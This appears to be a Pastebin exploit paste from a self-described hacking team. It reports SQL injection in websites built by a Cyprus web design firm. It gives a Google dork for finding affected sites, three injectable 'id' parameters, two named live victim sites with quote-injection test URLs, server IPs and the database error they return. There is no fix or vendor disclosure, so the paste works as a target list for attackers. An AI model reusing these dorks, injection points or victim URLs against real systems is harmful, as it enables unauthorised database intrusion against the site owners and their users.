Advertisement
KingSkrupellos

İdeaSeven Web Design Cyprus SQL Injection

Jan 9th, 2019
308
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.73 KB | None | 0 0
  1. ###############################################################
  2.  
  3. # Exploit Title : İdeaSeven Web Design Cyprus SQL Injection Vulnerability
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 10/01/2019
  7. # Vendor Homepage : ideaseven.com
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : intext:''web design by ideaseven.com'' site:cy
  12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  13. Special Elements used in an SQL Command ('SQL Injection') ]
  14. # Cyberizm Exploit Reference Link :
  15. cyberizm.org/cyberizm-ideaseven-web-design-cyprus-sql-injection.html
  16.  
  17. ###############################################################
  18.  
  19. # SQL Injection Exploit :
  20. ***********************
  21.  
  22. /link.php?id=[SQL Injection]
  23.  
  24. /all_articles.php?id=[SQL Injection]
  25.  
  26. /news_events.php?id=[SQL Injection]
  27.  
  28. ###############################################################
  29.  
  30. # Example Vulnerable Site :
  31. *************************
  32.  
  33. Note : (46.249.205.44) => There are 95 domains hosted on this server.
  34.  
  35. Note : (78.46.191.194) => There are 87 domains hosted on this server.
  36.  
  37. [+] coucounislaw.com/link.php?id=207%27 =>
  38.  
  39. [ Proof of Concept ] => archive.fo/Mpp0F
  40.  
  41. [+] yiannakas.com/link.php?id=108%27
  42.  
  43. ###############################################################
  44.  
  45. # SQL Database Error :
  46. **********************
  47.  
  48. You have an error in your SQL syntax; check the manual that
  49.  
  50. corresponds to your MySQL server version for
  51.  
  52. the right syntax to use near '\'' at line 1
  53.  
  54. ###############################################################
  55.  
  56. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  57.  
  58. ###############################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement